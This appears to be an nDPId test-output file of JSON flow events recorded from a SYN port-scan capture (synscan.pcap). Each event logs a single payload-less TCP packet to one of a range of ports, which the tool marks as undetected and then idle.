-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1088,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1089,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1088,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1089,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21571,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1091,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27715,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27715,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21571,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1092,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1092,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1091,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1009,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27715,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1009,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27715,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1092,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1092,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1093,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1094,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1093,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5190,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1094,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5190,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1095,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1096,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1096,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1095,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 